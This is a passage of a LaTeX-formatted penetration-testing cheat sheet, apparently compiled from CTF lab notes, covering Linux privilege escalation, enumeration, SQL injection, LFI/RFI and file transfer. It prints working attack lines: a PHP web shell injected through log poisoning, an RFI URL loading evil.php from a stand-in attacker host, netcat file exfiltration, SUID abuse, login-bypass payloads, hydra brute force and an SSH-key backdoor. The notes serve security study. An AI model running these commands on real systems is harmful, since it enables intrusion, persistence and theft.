cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 20 \SetRowColor{LightBackground} Escalate privilege via cronjob of a python script & \{\{fa-bolt\}\} \seqsplit{https://blog.razrsec.uk/tryhackme-tartarus/} \tn % Row Count 3 (+ 3) % Row 21 \SetRowColor{white} Exploiting SUID & \{\{fa-bolt\}\} Find command which have SUID bit set which means we can run find as root user. Using -exec flag as shown above. Let's try out by changing the permission of root directory. \{\{nl\}\}\{\{fa-bolt\}\} \$ find . -exec chmod 777 /root \textbackslash{}; \tn % Row Count 15 (+ 12) % Row 22 \SetRowColor{LightBackground} Su VS Sudo & \{\{fa-bolt\}\} Su is Permanent privilege escalation (su): It can be used to switch user accounts in the command line mode. \{\{nl\}\}\{\{fa-bolt\}\} Sudo is Temporary privilege escalation (sudo): Switch the current user to the super user, then execute the command as the super user, and return to the current user directly after the execution is completed. \{\{nl\}\} \{\{link="https://www.programmersought.com/article/69434807416/"\}\}Sudo-Su-Working\{\{/link\}\} \tn % Row Count 38 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 23 \SetRowColor{LightBackground} Privilege escalation 2 ways & \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/"\}\}Privilege escalation using capabilities\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8"\}\}lPrivilege escalation using Python Library hijack\{\{/link\}\} \tn % Row Count 17 (+ 17) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Upload tools and stuff - \seqsplit{https://prune2000.github.io/post/upload-tools/} \newline \newline http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows cmd commands}} \tn % Row 0 \SetRowColor{LightBackground} Discover users & \{\{fa-bolt\}\} net user \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Read text file & \{\{fa-bolt\}\} type root.txt \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} list directory content & \{\{fa-bolt\}\} dir \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} Change directory & \{\{fa-bolt\}\} cd \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} Read file permission and owner & \{\{fa-bolt\}\} Right click \textgreater{} Properties \textgreater{} Details \textgreater{} Owner \{\{fa-bolt\}\} Goto security tab \textgreater{} edit permission \textgreater{} Add \textgreater{} enter the name of user you want to give permission \tn % Row Count 14 (+ 8) % Row 5 \SetRowColor{white} Upgrade Command Shell to Meterpreter & sessions -u \textless{}no\textgreater{} or use use \seqsplit{post/multi/manage/shell\_to\_meterpreter} \tn % Row Count 18 (+ 4) % Row 6 \SetRowColor{LightBackground} Metasploit get hashes of users & hashdump \tn % Row Count 20 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Directory Structure}} \tn % Row 0 \SetRowColor{LightBackground} Directory Name & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} When basic priv esc doesnt work search these directories for Juice & \{\{fa-bolt\}\} /opt \& /var -\textgreater{} www \& log \& backups. Make sure you review Linpeas properly such as Readable files belonging to root and readable by me but not world readable \tn % Row Count 10 (+ 9) % Row 2 \SetRowColor{LightBackground} /opt & /opt is a directory for installing unbundled packages (i.e. packages not part of the Operating System distribution, but provided by an independent source), each one in its own subdirectory. \{\{nl\}\} Sometimes, we can find config files over here, having credentials. \{\{nl\}\} Thus its a Installed software locations, other dir. are /usr/local. \tn % Row Count 27 (+ 17) % Row 3 \SetRowColor{white} /var & /var contains things that are prone to change, such as websites, temporary files, config and databases. \tn % Row Count 33 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Directory Structure (cont)}} \tn % Row 4 \SetRowColor{LightBackground} /bin (system commands) & /bin contains executables which are required by the system for emergency repairs, booting, and single user mode. \{\{nl\}\} /usr/bin contains any binaries that aren't required. \tn % Row Count 9 (+ 9) % Row 5 \SetRowColor{white} /usr/bin (executable commands) & This is the primary directory of executable commands on the system. \tn % Row Count 13 (+ 4) % Row 6 \SetRowColor{LightBackground} /etc & lookout for logs, backups, config files \tn % Row Count 15 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OWASP TOP 10 and others}} \tn % Row 0 \SetRowColor{LightBackground} \{\{fa-exclamation-circle\}\} Vulnerability - along with its mitigation & \{\{fa-user-secret\}\} Hunt down \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \{\{fa-arrow-circle-right\}\} \{\{link="http://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm"\}\}SQL injection\{\{/link\}\} & \{\{fa-bolt\}\} test' or 1=1; -{}- \{\{nl\}\}\{\{fa-bolt\}\} ' is used to close the query, ; is used to terminate, -{}- is used to comment out rest \{\{nl\}\}\{\{fa-bolt\}\} For example ' -{}-, creating a new account blacklist' -{}- then can alter the query \tn % Row Count 16 (+ 12) % Row 2 \SetRowColor{LightBackground} \{\{fa-arrow-circle-right\}\} Second-order-SQL & \{\{fa-bolt\}\} What happens is there is a query like \{\{nl\}\}\{\{fa-bolt\}\} UPDATE users set password="new pass" where username="blacklist ' -{}-" and password="this is for current password" \{\{nl\}\}\{\{fa-bolt\}\} Now when we use this query after -{}- becomes just a comment which have no use now and it will directly changed the pass of old user \tn % Row Count 33 (+ 17) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OWASP TOP 10 and others (cont)}} \tn % Row 3 \SetRowColor{LightBackground} \{\{fa-arrow-circle-right\}\} SQL Mitigation & \{\{fa-bolt\}\} Parameterized Statements: Don't put the input variable directly into SQL statement, parse it separately \{\{nl\}\} \{\{fa-bolt\}\} Vulnerable : "Select * From users WHERE email = "" + email + ""; \{\{nl\}\} \{\{fa-bolt\}\} Sanitizing inputs \tn % Row Count 12 (+ 12) % Row 4 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} SSRF} \tn % Row Count 13 (+ 1) % Row 5 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} LFI / RFI} \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} S3 bucket} \tn % Row Count 15 (+ 1) % Row 7 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} IDOR} \tn % Row Count 16 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Attention to detail & Is something wrong like text at the end \{\{nl\}\} Everything makes sense like password \{\{nl\}\} Lookout for possible usernames, directory, information \{\{nl\}\} Focus should also be on understanding application you are enumerating and its working and what is going on \{\{nl\}\} Connect the Dots like telnet might be running an .exe which is vulnerable to BoF \tn % Row Count 19 (+ 18) % Row 2 \SetRowColor{LightBackground} Starting Enumeration & \{\{fa-bolt\}\} ifconfig \{\{fa-bolt\}\} Host discovery : nmap -sn \textless{}ip\textgreater{}/24 \{\{nl\}\} \{\{fa-bolt\}\} Explore each service running and grab banners using netcat : nc -nv \textless{}ip\textgreater{} \textless{}port\textgreater{} \{\{nl\}\} \{\{fa-bolt\}\} Finding if the service has any version based vulnerability or not via google and searchsploit \{\{nl\}\} \{\{fa-bolt\}\} What do we have and what can be done ? like we might have a directory already which can be further /-FUZZ- \{\{nl\}\} \{\{fa-bolt\}\} Pentest \textless{}service\textgreater{} hacktricks / hackingarticles \tn % Row Count 43 (+ 24) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 3 \SetRowColor{LightBackground} HTTP / HTTPS 80 \& 443 & \{\{fa-bolt\}\} https \{\{fa-bolt\}\} robots.txt /* \{\{fa-bolt\}\} source code review \{\{fa-bolt\}\} directory enum \{\{fa-bolt\}\} vulnerability like LFI , SQL. Every vulnerability has its indicators \{\{fa-bolt\}\} extension check \{\{fa-bolt\}\} Double /-FUZZ- on paths and parameter \{\{fa-bolt\}\}\{\{nl\}\} Play with Burp, request to understand application flow \&\& Play with headers, x-forwarded-for can be used to bypass rate limit or IP ban \tn % Row Count 21 (+ 21) % Row 4 \SetRowColor{white} More Port 80 / HTTPS checklist & \{\{fa-bolt\}\} is it a CMS \{\{fa-bolt\}\} Nikto for web vulnerability scanning \{\{fa-bolt\}\} Discover if website /index.php or /index.html \{\{fa-bolt\}\} Id in URL - FUZZING can lead to dir. traversal or LFI \{\{fa-bolt\}\} If given domain name try bruteforce subdomains / vhosts \{\{fa-bolt\}\} Wildguess : If there are 2 http ports open, one service might impact other, or leak information. \{\{nl\}\} \{\{fa-bolt\}\} Login Form : Hunt for username, brute-force, SQL injection bypass on both User \& Pass Parameter = admin' OR '1'='1;-{}-+ \tn % Row Count 47 (+ 26) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 5 \SetRowColor{LightBackground} FTP & \{\{fa-bolt\}\} Anonymous login \{\{fa-bolt\}\} brute force \{\{fa-bolt\}\} CVE cd... \{\{fa-bolt\}\} dir use it returns a full directory listing whereas the ls -al returns hidden and simplified directory listing. \{\{fa-bolt\}\} Google Version for exploits or vulnerability \{\{nl\}\} PUT command files on the server and http server to trigger \{\{fa-bolt\}\} After login, which directory you are currently in , are the files owned by root? Try cd .. \tn % Row Count 22 (+ 22) % Row 6 \SetRowColor{white} CMS & \{\{fa-bolt\}\} Hunt for admin panel \{\{fa-bolt\}\} Login Panel - Default creds for that service \& small brute-force for common creds test \{\{fa-bolt\}\} Aim for Usernames and Password\{\{fa-bolt\}\} Always read source, https , robots and dirb \{\{nl\}\} \{\{fa-bolt\}\} Always study that CMS like upload path and other important directory names \{\{nl\}\} \{\{fa-bolt\}\} FUZZ for subdomains via ffuf \{\{fa-bolt\}\} Hunt CMS Version \& Search for Exploit / Vulnerability for that version \tn % Row Count 45 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 7 \SetRowColor{LightBackground} Directory Enumeration & \{\{fa-bolt\}\} gobuster dir -u http://10.10.97.63/ -w \seqsplit{/usr/share/wordlists/raft-large-directories-lowercase}.txt -t 40 -x php,bak,txt \{\{nl\}\} \{\{fa-bolt\}\} Always use raft and 2.3 medium wordlist for bruteforce. Remember to specify extension check. \{\{nl\}\} \{\{fa-bolt\}\} /example/\{\{fuzz\}\} : Remember to FUZZ double/directory too. \tn % Row Count 16 (+ 16) % Row 8 \SetRowColor{white} Service Enumeration & \{\{fa-bolt\}\} Enumerate the service \{\{nl\}\}\{\{fa-bolt\}\} Find login page like directory path for that service \{\{nl\}\}\{\{fa-bolt\}\} like where is the login page located \{\{nl\}\}\{\{fa-bolt\}\} Checkout Youtube and others for exploiting that service \tn % Row Count 28 (+ 12) % Row 9 \SetRowColor{LightBackground} Enumeration tip & \{\{fa-bolt\}\} after getting shell as www - data always check /var/www and save current user private key \seqsplit{/home/paul/.ssh/id\_rsa} and we might be able to login as another user directly \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 10 \SetRowColor{LightBackground} HTTP Directory Enumeration & \{\{fa-bolt\}\} 3 Wordlists - common.txt, \seqsplit{dirbuster/directory-list-2}.3-medium.txt, \seqsplit{seclists/raft-large-directories-lowercase}.txt \{\{nl\}\}\{\{fa-bolt\}\} dirsearch -u 10.0.2.19 -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-2}.3-medium.txt -e * -t 50 \tn % Row Count 13 (+ 13) % Row 11 \SetRowColor{white} Database Penetration Testing (SqlMap) & \{\{fa-bolt\}\} Always lookout for an id in the URL, vulnerable to SQL. which might be using a database \{\{fa-bolt\}\} sqlmap -u \seqsplit{"http://10.0.2.6:8080/mercuryfacts/1"} -{}-dbs -{}-batch \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/"\}\}Guide-sqlmap\{\{/link\}\} \{\{nl\}\} Enumerate login forms, id value, parameters for SQL vulnerability via burp request or sqlmap \tn % Row Count 34 (+ 21) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 12 \SetRowColor{LightBackground} Upgrading a Simple Shells to Fully Interactive (TTY) & `python -c 'import pty; \seqsplit{pty.spawn("/bin/sh")'`} \tn % Row Count 3 (+ 3) % Row 13 \SetRowColor{white} Enumeration Scripts & LinEnum, Linpeas, LES , pspy64 or pspy32 \tn % Row Count 5 (+ 2) % Row 14 \SetRowColor{LightBackground} & Linux exploit suggestor \tn % Row Count 7 (+ 2) % Row 15 \SetRowColor{white} Netstat on the victim machine & \{\{fa-bolt\}\} To view incoming and outgoing connection and might find a port not coming up in scan \{\{fa-bolt\}\}\{\{nl\}\} netstat -tulpn \tn % Row Count 14 (+ 7) % Row 16 \SetRowColor{LightBackground} Sqlmap to perform enumeration (Banner Grabbing) & Capture burp request and test it on Login forms \{\{nl\}\} Command: sqlmap -r .txt file\_name -{}-dbs \tn % Row Count 19 (+ 5) % Row 17 \SetRowColor{white} SQL - important files (hacktricks), cleartext .mysql\_history in /home dir & The output comes up with the list of databases in the remote server. \{\{nl\}\} \seqsplit{https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/} \tn % Row Count 27 (+ 8) % Row 18 \SetRowColor{LightBackground} Cipher Identifier and Analyzer & \seqsplit{https://www.boxentriq.com/code-breaking/cipher-identifier} \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 19 \SetRowColor{LightBackground} Password Hash Cracker & \seqsplit{https://crackstation}.net/ \tn % Row Count 2 (+ 2) % Row 20 \SetRowColor{white} Vigenere cipher (Long text vulnerable) & \seqsplit{https://www.guballa.de/vigenere-solver} \tn % Row Count 4 (+ 2) % Row 21 \SetRowColor{LightBackground} All in one Decoder & \seqsplit{https://gchq.github.io/CyberChef/} \tn % Row Count 6 (+ 2) % Row 22 \SetRowColor{white} Cipher and Hash identification & \{\{fa-bolt\}\} \seqsplit{https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html} \{\{nl\}\}\{\{fa-bolt\}\} ASCII RANGE 60-120,ABC \{\{nl\}\}\{\{fa-bolt\}\} HEX 41 42 \{\{nl\}\}\{\{fa-bolt\}\} Decimal and Binary \{\{nl\}\}\{\{fa-bolt\}\} Base64 number and upper and lower case \{\{nl\}\}\{\{fa-bolt\}\} MD5 lower case numbers and 32 in length \tn % Row Count 22 (+ 16) % Row 23 \SetRowColor{LightBackground} Find files with common extension & find / -name *.txt 2\textgreater{}/dev/null \tn % Row Count 24 (+ 2) % Row 24 \SetRowColor{white} Hashcat & \{\{fa-bolt\}\} The crypt formats all have a prefix \{\{nl\}\}\{\{fa-bolt\}\} \$1\$ is md5crypt, \$2\$ is bcrypt, \$5\$ is sha256crypt, \$6\$ is sha512crypt \{\{nl\}\}\{\{fa-bolt\}\} Ciphey tool and hashcat wiki \tn % Row Count 34 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 25 \SetRowColor{LightBackground} Etc/Shadow File & \{\{fa-bolt\}\} Understanding the /etc/shadow File \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://linuxize.com/post/etc-shadow-file/} \tn % Row Count 6 (+ 6) % Row 26 \SetRowColor{white} THM Cryptography Room - RSA tool & \{\{fa-bolt\}\} \{\{link="https://github.com/Ganapati/RsaCtfTool"\}\}link text\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} PGP stands for Pretty Good Privacy. It's a software that implements encryption for encrypting files, performing digital signing and more. and Similarly we have GPG open source and you can decrypt a file using gpg \tn % Row Count 22 (+ 16) % Row 27 \SetRowColor{LightBackground} Another tip for service enum & \{\{fa-bolt\}\} Most of privilege escalation to users after www-data is through hash or some given pass, enumerate files of that service like where is the database files stored inside this service or where is the users info stored in that service \tn % Row Count 35 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 28 \SetRowColor{LightBackground} Copy all files into a single file & \{\{fa-bolt\}\} cat * \textgreater{} blacklist.txt \tn % Row Count 2 (+ 2) % Row 29 \SetRowColor{white} LFI / RFI Final Cheat sheet, Detailed Attack Vectors \{\{nl\}\} File Inclusion / Directory traversal \{\{nl\}\} Payload all the Things & \{\{fa-bolt\}\} \{\{link="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File\%20Inclusion"\}\}Cheatsheet\{\{/link\}\} \{\{fa-bolt\}\} \{\{link="https://medium.com/@asfiyashaikh10/file-path-traversal-and-file-inclusions-7c567da9e226"\}\}File Inclusion Attacks\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://book.hacktricks.xyz/pentesting-web/file-inclusion"\}\}File Inclusion Hacktricks\{\{/link\}\} \tn % Row Count 22 (+ 20) % Row 30 \SetRowColor{LightBackground} File Inclusions Attacks \{\{nl\}\} To expand, in an RFI attack, a hacker employs a script to include a remotely hosted file on the webserver. In an LFI attack, a hacker uses local files to execute a malicious script. For LFI, it is possible for a hacker to only use a web browser to carry out the attack. & \{\{fa-bolt\}\} On the other hand, Local File Inclusion (LFI) is very much similar to RFI. The only difference being that in LFI, in order to carry out the attack instead of including remote files, the attacker has to use local files i.e files on the current server can only be used to execute a malicious script. Since this form of vulnerability can be exploited with only using a web browser, LFI can easily lead to remote code execution by including a file containing attacker-controlled data such as the web server's access logs. like log posioning \{\{nl\}\}\{\{nl\}\}\{\{fa-bolt\}\} Remote File Inclusion (RFI) is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to 'include' or 'require' additional files within a script. The use of unvalidated user-supplied input within these scripts generally leads to the exploitation of this vulnerability. \tn % Row Count 73 (+ 51) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 31 \SetRowColor{LightBackground} LFI local file inclusion & \{\{fa-bolt\}\} If you find paramter /index.php?plot= \{\{nl\}\}\{\{fa-bolt\}\} Try Fuzzing manually or Burp. LFI (local file inclusion) is a vulnerability which an attacker can exploit to include/read files. \{\{nl\}\}\{\{fa-bolt\}\} Therefore, whenever you see a PHP website try FUZZING as these are sometimes vulnerable to LFI or RFI + Use Directory Traversal \tn % Row Count 18 (+ 18) % Row 32 \SetRowColor{white} LFI vulnerability & \{\{fa-bolt\}\} Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log. \{\{nl\}\}\{\{fa-bolt\}\} add the "?page=" parameter and let's try reading the apache log file. The log file is located at the following path: \seqsplit{/var/log/apache2/access}.log \{\{nl\}\}\{\{fa-bolt\}\} Fire up Burpsuite and intercept the request and insert the following malicious code in the user agent field (The PHP command will allow us to execute system commands by parsing the input to a GET parameter called lfi) \{\{nl\}\}\{\{fa-bolt\}\} The link becomes: http://\textless{}IP\textgreater{}/lfi/lfi.php?page=/var/log/apache2/access.log\&lfi= Now you can execute commands on the system! \tn % Row Count 55 (+ 37) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 33 \SetRowColor{LightBackground} Log poisoning attack vector through LFI is possible using Directory traversal and other ways like SMTP & \{\{fa-bolt\}\} Forward the request and add your parameter to the link (in my case lfi). \{\{nl\}\}\{\{fa-bolt\}\} User-Agent: Mozilla/5.0 \textless{}?php system(\$\_GET{[}'lfi'{]}); ?\textgreater{} Firefox/68.0 \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{lfi.php?page=/var/log/apache2/access.log\&lfi=cd} /home;cd lfi/;cat flag.txt;ls -lap;uname -r;ls -la \tn % Row Count 15 (+ 15) % Row 34 \SetRowColor{white} RFI/LFI (by specifying path we can even read user and root flag if server is running with root permissions) & \{\{fa-bolt\}\} Lookout for parameters and To put it another way. The page we're looking at is actually empty; however, it's including content from another page \{\{nl\}\}\{\{fa-bolt\}\} Local File Inclusions are when that input isn't properly sanitised, allowing us to manipulate the link to open other files. or incase of RFI we can supply an external URL and gain Shell \tn % Row Count 34 (+ 19) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 35 \SetRowColor{LightBackground} RFI & \{\{fa-bolt\}\} \seqsplit{http://example.com/?file=http://attacker.example.com/evil.php} \{\{nl\}\}\{\{fa-bolt\}\} In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server. \tn % Row Count 17 (+ 17) % Row 36 \SetRowColor{white} Exploit SUID \& Backdoor & \{\{fa-bolt\}\} PATH of SUID binary and GTFO command together to gain root access \{\{nl\}\}\{\{fa-bolt\}\} ssh-keygen .ssh/auth-keys Leaving an SSH key in authorized\_keys on a box can be a useful backdoor \tn % Row Count 27 (+ 10) % Row 37 \SetRowColor{LightBackground} Hash-id \& Crack Hash online otherwise use hashcat or JTR & \{\{fa-bolt\}\} \{\{link="https://md5hashing.net/hash"\}\}MD5 Hashing\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://crackstation.net/"\}\}Crack-Station\{\{/link\}\} \tn % Row Count 35 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 38 \SetRowColor{LightBackground} Hydra crack login page & \{\{fa-bolt\}\} Provide full path like /index.php mostly otherwise it wont work \{\{nl\}\}\{\{fa-bolt\}\} When providing path test /index.php to identify PHP is running \{\{nl\}\}\{\{fa-bolt\}\} hydra 10.10.10.227 -l admin -P \seqsplit{/usr/share/wordlists/rockyou}.txt http-post-form '/admin/index.php:user=admin\&pass=\textasciicircum{}PASS\textasciicircum{}:Username or password invalid' -f \tn % Row Count 17 (+ 17) % Row 39 \SetRowColor{white} Sudo gives you permission to execute Scripts & \{\{fa-bolt\}\} Remove that script and replace with a shell \tn % Row Count 20 (+ 3) % Row 40 \SetRowColor{LightBackground} Brute force after you get usernames or password list hint & \{\{fa-bolt\}\} hydra, if you get usernames \tn % Row Count 23 (+ 3) % Row 41 \SetRowColor{white} Port Knocking : If you see numbers as hint might be port knocking & \{\{fa-bolt\}\} Knock on the ports mentioned to open hidden ports \{\{nl\}\}\{\{fa-bolt\}\} for x in 1 3 5; do nmap -Pn -{}-max-retries 0 -p \$x 10.10.63.86; done \{\{nl\}\}\{\{fa-bolt\}\} nmap -r -p1,3,5 10.10.17.17 \tn % Row Count 33 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 42 \SetRowColor{LightBackground} SQL \& XSS Indicators & \{\{fa-bolt\}\} For XSS, target Text boxes and URL, XSS might also get triggered on another page, For SQL test URL like Id or login pages. \tn % Row Count 7 (+ 7) % Row 43 \SetRowColor{white} SMTP & \{\{fa-bolt\}\} Runs on Port 25, Nmap has scripts like -{}-script smtp-commands \&\& google search with hacktricks and hackingarticles for possible enumeration techniques \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.jscape.com/blog/smtp-vs-imap-vs-pop3-difference"\}\}Understand the difference\{\{/link\}\} \tn % Row Count 22 (+ 15) % Row 44 \SetRowColor{LightBackground} 139 \& 445 SMB , for more refer hacktricks & \{\{fa-bolt\}\} Check null session, Shares list , Enum4linux \{\{nl\}\}\{\{fa-bolt\}\} enum4linux -a 10.0.2.19 \{\{nl\}\} Smbclient -L \textless{}ip\textgreater{} to list shares \&\& -N to force without password \&\& smbclient //\textless{}ip\textgreater{}/\textless{}share-name\textgreater{} \tn % Row Count 33 (+ 11) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Enumeration and Understanding of the scenario are very important aspects. \newline Think if you need something like credentials is there any way to access them from current options available. \newline {\bf{CREDENTIALS}}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands}} \tn % Row 0 \SetRowColor{LightBackground} Command Name & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Vim Text Editor & \{\{fa-bolt\}\} i for insert \{\{fa-bolt\}\} esc to exit insert \{\{fa-bolt\}\} :wq to quit and save \{\{fa-bolt\}\} :\%d delete all lines \tn % Row Count 8 (+ 7) % Row 2 \SetRowColor{LightBackground} Hashcat (crack password hash) & \{\{fa-bolt\}\} hashcat -a 0 -m 500 hash \seqsplit{/root/Downloads/rockyou}.txt -{}-force\{\{nobreak\}\} \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} Transfer Files via Nc \& Base64 (move files) & \{\{nl\}\} \{\{fa-bolt\}\} On Victim : nc -nv 10.0.2.5 5555 \textless{} access.exe \{\{nl\}\} \{\{fa-bolt\}\} On Attacker : nc -nlvp 5555 \textgreater{} access.exe \{\{nl\}\} \{\{fa-bolt\}\} base64 \textless{}filename\textgreater{} \{\{nl\}\} \{\{fa-bolt\}\} Save the encoding in a file \{\{nl\}\} \{\{fa-bolt\}\} base64 -d \textless{}filename\_base64\_encoding\textgreater{} \tn % Row Count 27 (+ 14) % Row 4 \SetRowColor{LightBackground} Scp (secure copy files) & \{\{fa-bolt\}\} Want to receive files from target \{\{nl\}\} \{\{fa-bolt\}\} scp \seqsplit{username@remote:/file/to/send} /where/to/put \tn % Row Count 33 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak 